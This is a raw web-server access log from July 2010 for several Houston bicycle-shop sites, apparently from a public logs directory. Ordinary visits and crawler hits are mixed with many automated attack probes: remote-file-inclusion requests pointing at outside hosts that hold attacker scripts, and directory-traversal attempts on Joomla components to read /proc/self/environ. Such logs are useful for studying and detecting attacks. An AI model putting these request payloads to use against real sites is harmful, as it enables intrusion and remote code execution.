69.73.157.122 - - [12/Jul/2010:15:53:49 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.svbikes.com"
38.111.147.83 - - [12/Jul/2010:15:57:13 -0700] "GET /logs/access.log HTTP/1.0" 200 373645 "-" "TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)" "www.svbikes.com"
38.111.147.83 - - [12/Jul/2010:15:57:56 -0700] "GET /logs/access_090510.log HTTP/1.0" 200 2818048 "-" "TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)" "www.svbikes.com"
38.111.147.83 - - [12/Jul/2010:15:58:39 -0700] "GET /logs/access_090610.log HTTP/1.0" 200 3276800 "-" "TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)" "www.svbikes.com"
38.111.147.83 - - [12/Jul/2010:15:59:20 -0700] "GET /logs/access_091210.log HTTP/1.0" 200 3604480 "-" "TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)" "www.svbikes.com"
38.111.147.83 - - [12/Jul/2010:15:59:57 -0700] "GET /logs/access_100110.log HTTP/1.0" 200 2752512 "-" "TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)" "www.svbikes.com"
83.143.84.59 - - [12/Jul/2010:16:10:35 -0700] "GET /logs/access.log//index.php?option=com_wmi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
83.143.84.59 - - [12/Jul/2010:16:10:35 -0700] "GET /index.php?option=com_wmi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
83.143.84.59 - - [12/Jul/2010:16:10:35 -0700] "GET /logs//index.php?option=com_wmi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
83.143.84.59 - - [12/Jul/2010:16:11:27 -0700] "GET /index.php?option=com_wmi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
85.25.143.96 - - [12/Jul/2010:16:17:16 -0700] "GET /logs/access.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "houstonbikeshop.com"
85.25.143.96 - - [12/Jul/2010:16:17:17 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "houstonbikeshop.com"
85.25.143.96 - - [12/Jul/2010:16:17:17 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "houstonbikeshop.com"
85.25.143.96 - - [12/Jul/2010:16:17:30 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "houstonbikeshop.com"
76.30.176.195 - - [12/Jul/2010:16:18:12 -0700] "GET / HTTP/1.1" 200 1764 "http://www.google.com/search?q=spring+valley+bikes&rls=com.microsoft:*:IE-SearchBox&ie=UTF-8&oe=UTF-8&sourceid=ie7&rlz=1I7DKUS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)" "www.svbikes.com"
76.30.176.195 - - [12/Jul/2010:16:18:13 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)" "www.svbikes.com"
76.30.176.195 - - [12/Jul/2010:16:18:15 -0700] "GET / HTTP/1.1" 200 1764 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)" "www.svbikes.com"
76.30.176.195 - - [12/Jul/2010:16:18:23 -0700] "GET /Employeesite/ HTTP/1.1" 401 - "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)" "www.svbikes.com"
76.30.176.195 - - [12/Jul/2010:16:18:30 -0700] "GET /P1000199.JPG HTTP/1.1" 200 1640919 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)" "www.svbikes.com"
76.30.176.195 - - [12/Jul/2010:16:18:38 -0700] "GET /bullitinboard/ HTTP/1.1" 200 533 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)" "www.svbikes.com"
61.67.201.187 - - [12/Jul/2010:16:19:17 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://razi.teo.ir/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.svbikes.com"
61.67.201.187 - - [12/Jul/2010:16:19:17 -0700] "GET /logs/access_100510.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://razi.teo.ir/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.svbikes.com"
61.67.201.187 - - [12/Jul/2010:16:19:18 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://razi.teo.ir/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.svbikes.com"
85.25.143.96 - - [12/Jul/2010:16:19:30 -0700] "GET /logs/access.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "houstonbikeshop.com"
85.25.143.96 - - [12/Jul/2010:16:19:30 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "houstonbikeshop.com"
85.25.143.96 - - [12/Jul/2010:16:19:30 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "houstonbikeshop.com"
61.67.201.187 - - [12/Jul/2010:16:19:31 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://razi.teo.ir/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.svbikes.com"
61.67.201.187 - - [12/Jul/2010:16:19:31 -0700] "GET /logs/access_100510.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://razi.teo.ir/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.svbikes.com"
61.67.201.187 - - [12/Jul/2010:16:19:31 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://razi.teo.ir/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.svbikes.com"
67.195.112.217 - - [12/Jul/2010:16:25:26 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
67.195.112.217 - - [12/Jul/2010:16:25:27 -0700] "GET /bullitinboard/viewtopic.php?p=15851 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
61.67.201.187 - - [12/Jul/2010:16:34:01 -0700] "GET /logs/access_100510.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://razi.teo.ir/images/gallery/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.svbikes.com"
61.67.201.187 - - [12/Jul/2010:16:34:01 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://razi.teo.ir/images/gallery/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.svbikes.com"
61.67.201.187 - - [12/Jul/2010:16:34:01 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://razi.teo.ir/images/gallery/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.svbikes.com"
61.67.201.187 - - [12/Jul/2010:16:36:12 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://razi.teo.ir/images/gallery/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.svbikes.com"
61.67.201.187 - - [12/Jul/2010:16:36:12 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://razi.teo.ir/images/gallery/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.svbikes.com"
61.67.201.187 - - [12/Jul/2010:16:36:12 -0700] "GET /logs/access_100510.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://razi.teo.ir/images/gallery/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.svbikes.com"
61.67.201.187 - - [12/Jul/2010:16:36:42 -0700] "GET /logs/access_100510.log%22%20%20target=%22_blank//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://razi.teo.ir/images/gallery/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.svbikes.com"
69.73.157.122 - - [12/Jul/2010:16:39:56 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "houstonbikeshop.com"
69.73.157.122 - - [12/Jul/2010:16:39:56 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "houstonbikeshop.com"
69.73.157.122 - - [12/Jul/2010:16:39:56 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "houstonbikeshop.com"
66.109.23.172 - - [12/Jul/2010:16:42:04 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "houstonbikeshop.com"
66.109.23.172 - - [12/Jul/2010:16:42:04 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "houstonbikeshop.com"
66.109.23.172 - - [12/Jul/2010:16:42:05 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "houstonbikeshop.com"
72.232.217.226 - - [12/Jul/2010:17:36:39 -0700] "GET /logs/calendar//tools/send_reminders.php?noSet=0&includedir=http://96.0.181.28/plugins/content/ins/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.232.217.226 - - [12/Jul/2010:17:36:39 -0700] "GET /calendar//tools/send_reminders.php?noSet=0&includedir=http://96.0.181.28/plugins/content/ins/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.232.217.226 - - [12/Jul/2010:17:36:39 -0700] "GET /logs/access.log%20%20/calendar//tools/send_reminders.php?noSet=0&includedir=http://96.0.181.28/plugins/content/ins/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.232.217.226 - - [12/Jul/2010:17:38:42 -0700] "GET /logs/calendar//tools/send_reminders.php?noSet=0&includedir=http://96.0.181.28/plugins/content/ins/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
72.232.217.226 - - [12/Jul/2010:17:38:42 -0700] "GET /calendar//tools/send_reminders.php?noSet=0&includedir=http://96.0.181.28/plugins/content/ins/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
72.232.217.226 - - [12/Jul/2010:17:38:42 -0700] "GET /logs/access_091010.log%20%20/calendar//tools/send_reminders.php?noSet=0&includedir=http://96.0.181.28/plugins/content/ins/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
72.232.217.226 - - [12/Jul/2010:17:38:52 -0700] "GET /logs/access_091110.log%20%20/calendar//tools/send_reminders.php?noSet=0&includedir=http://96.0.181.28/plugins/content/ins/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
72.232.217.226 - - [12/Jul/2010:17:40:43 -0700] "GET /logs/access.log/calendar//tools/send_reminders.php?noSet=0&includedir=http://96.0.181.28/plugins/content/ins/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.232.217.226 - - [12/Jul/2010:17:43:38 -0700] "GET /calendar//tools/send_reminders.php?noSet=0&includedir=http://96.0.181.28/plugins/content/ins/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "svbikes.com"
72.232.217.226 - - [12/Jul/2010:17:43:38 -0700] "GET /logs/access_091010.log/calendar//tools/send_reminders.php?noSet=0&includedir=http://96.0.181.28/plugins/content/ins/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "svbikes.com"
72.232.217.226 - - [12/Jul/2010:17:43:38 -0700] "GET /logs/calendar//tools/send_reminders.php?noSet=0&includedir=http://96.0.181.28/plugins/content/ins/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "svbikes.com"
95.154.248.22 - - [12/Jul/2010:17:50:45 -0700] "GET /main.php?sayfa=http://www.yangsheng.ru/board/fx29id.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
95.154.248.22 - - [12/Jul/2010:17:50:45 -0700] "GET /logs//main.php?sayfa=http://www.yangsheng.ru/board/fx29id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
95.154.248.22 - - [12/Jul/2010:17:50:45 -0700] "GET /logs/access_100510.log//main.php?sayfa=http://www.yangsheng.ru/board/fx29id.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
67.195.112.217 - - [12/Jul/2010:18:34:18 -0700] "GET /bullitinboard/viewtopic.php?p=4719 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
67.195.112.217 - - [12/Jul/2010:18:38:18 -0700] "GET /logs/access_091010.log HTTP/1.0" 200 6312959 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
67.201.60.20 - - [12/Jul/2010:19:09:19 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "houstonbikeshop.com"
174.121.191.5 - - [12/Jul/2010:19:09:21 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "houstonbikeshop.com"
174.121.191.5 - - [12/Jul/2010:19:09:29 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "houstonbikeshop.com"
81.93.240.134 - - [12/Jul/2010:19:09:45 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
67.201.60.20 - - [12/Jul/2010:19:11:46 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "houstonbikeshop.com"
64.207.204.37 - - [12/Jul/2010:19:19:50 -0700] "GET /logs/access_091010.log//bbs//skin/ggambo7002_board/write.php?dir=http://www.newyorksoulmates.com/readme.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "svbikes.com"
64.207.204.37 - - [12/Jul/2010:19:19:50 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.newyorksoulmates.com/readme.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "svbikes.com"
64.207.204.37 - - [12/Jul/2010:19:19:50 -0700] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.newyorksoulmates.com/readme.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "svbikes.com"
81.21.78.22 - - [12/Jul/2010:19:22:26 -0700] "GET /logs/access_091010.log//bbs//skin/ggambo7002_board/write.php?dir=http://chileenduro.cl/home/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "svbikes.com"
81.21.78.22 - - [12/Jul/2010:19:22:26 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://chileenduro.cl/home/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "svbikes.com"
81.21.78.22 - - [12/Jul/2010:19:22:26 -0700] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://chileenduro.cl/home/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "svbikes.com"
81.21.78.22 - - [12/Jul/2010:19:22:53 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://chileenduro.cl/home/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
64.207.204.37 - - [12/Jul/2010:19:25:28 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.newyorksoulmates.com/readme.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
67.201.60.20 - - [12/Jul/2010:19:27:01 -0700] "GET /logs/access.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "houstonbikeshop.com"
67.201.60.20 - - [12/Jul/2010:19:27:01 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "houstonbikeshop.com"
67.201.60.20 - - [12/Jul/2010:19:27:01 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "houstonbikeshop.com"
174.121.191.5 - - [12/Jul/2010:19:27:18 -0700] "GET /logs/access.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "houstonbikeshop.com"
174.121.191.5 - - [12/Jul/2010:19:27:18 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "houstonbikeshop.com"
174.121.191.5 - - [12/Jul/2010:19:27:19 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "houstonbikeshop.com"
174.121.191.5 - - [12/Jul/2010:19:28:57 -0700] "GET /logs/access.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "houstonbikeshop.com"
174.121.191.5 - - [12/Jul/2010:19:28:57 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "houstonbikeshop.com"
174.121.191.5 - - [12/Jul/2010:19:28:58 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.810" "houstonbikeshop.com"
81.93.240.134 - - [12/Jul/2010:19:31:44 -0700] "GET /logs/access.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
81.93.240.134 - - [12/Jul/2010:19:31:44 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
81.93.240.134 - - [12/Jul/2010:19:31:45 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
67.201.60.20 - - [12/Jul/2010:19:31:51 -0700] "GET /logs/access.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "houstonbikeshop.com"
67.201.60.20 - - [12/Jul/2010:19:31:51 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "houstonbikeshop.com"
67.201.60.20 - - [12/Jul/2010:19:31:51 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "houstonbikeshop.com"
81.93.240.134 - - [12/Jul/2010:19:34:39 -0700] "GET /logs/access.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
81.93.240.134 - - [12/Jul/2010:19:34:39 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
81.93.240.134 - - [12/Jul/2010:19:34:39 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
81.21.78.22 - - [12/Jul/2010:19:36:09 -0700] "GET /logs/access.log//bbs//skin/ggambo7002_board/write.php?dir=http://chileenduro.cl/home/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
81.21.78.22 - - [12/Jul/2010:19:36:09 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://chileenduro.cl/home/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
81.21.78.22 - - [12/Jul/2010:19:36:09 -0700] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://chileenduro.cl/home/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
62.44.82.118 - - [12/Jul/2010:19:38:12 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
62.44.82.118 - - [12/Jul/2010:19:40:41 -0700] "GET /logs/access.log//index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
62.44.82.118 - - [12/Jul/2010:19:40:41 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
62.44.82.118 - - [12/Jul/2010:19:40:42 -0700] "GET /logs//index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
75.136.121.230 - - [12/Jul/2010:19:42:13 -0700] "GET /logs/access.log/?sourcedir=http://www.jejucc.net/_APP/lib/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
75.136.121.230 - - [12/Jul/2010:19:42:13 -0700] "GET /?sourcedir=http://www.jejucc.net/_APP/lib/a??? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
75.136.121.230 - - [12/Jul/2010:19:42:14 -0700] "GET /logs/?sourcedir=http://www.jejucc.net/_APP/lib/a??? HTTP/1.1" 200 2940 "-" "Mozilla/5.0" "houstonbikeshop.com"
75.136.121.230 - - [12/Jul/2010:19:42:36 -0700] "GET /?sourcedir=http://www.jejucc.net/_APP/lib/a??? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
75.136.121.230 - - [12/Jul/2010:19:42:36 -0700] "GET /logs/?sourcedir=http://www.jejucc.net/_APP/lib/a??? HTTP/1.1" 200 2940 "-" "Mozilla/5.0" "houstonbikeshop.com"
75.136.121.230 - - [12/Jul/2010:19:42:36 -0700] "GET /logs/access.log%20%20/?sourcedir=http://www.jejucc.net/_APP/lib/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
75.136.121.230 - - [12/Jul/2010:19:43:46 -0700] "GET /logs/?sourcedir=http://www.jejucc.net/_APP/lib/a??? HTTP/1.1" 200 2940 "-" "Mozilla/5.0" "houstonbikeshop.com"
75.136.121.230 - - [12/Jul/2010:19:43:47 -0700] "GET /logs/access.log%20%20/?sourcedir=http://www.jejucc.net/_APP/lib/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
75.136.121.230 - - [12/Jul/2010:19:43:47 -0700] "GET /?sourcedir=http://www.jejucc.net/_APP/lib/a??? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
64.207.204.37 - - [12/Jul/2010:19:57:42 -0700] "GET /logs/access.log//bbs//skin/ggambo7002_board/write.php?dir=http://www.newyorksoulmates.com/readme.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
64.207.204.37 - - [12/Jul/2010:19:57:42 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.newyorksoulmates.com/readme.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
64.207.204.37 - - [12/Jul/2010:19:57:42 -0700] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.newyorksoulmates.com/readme.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
67.195.115.87 - - [12/Jul/2010:20:00:55 -0700] "GET /tmp/?D=A HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
93.160.123.150 - - [12/Jul/2010:20:04:44 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.160.123.150 - - [12/Jul/2010:20:04:44 -0700] "GET /logs/access.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.160.123.150 - - [12/Jul/2010:20:04:44 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
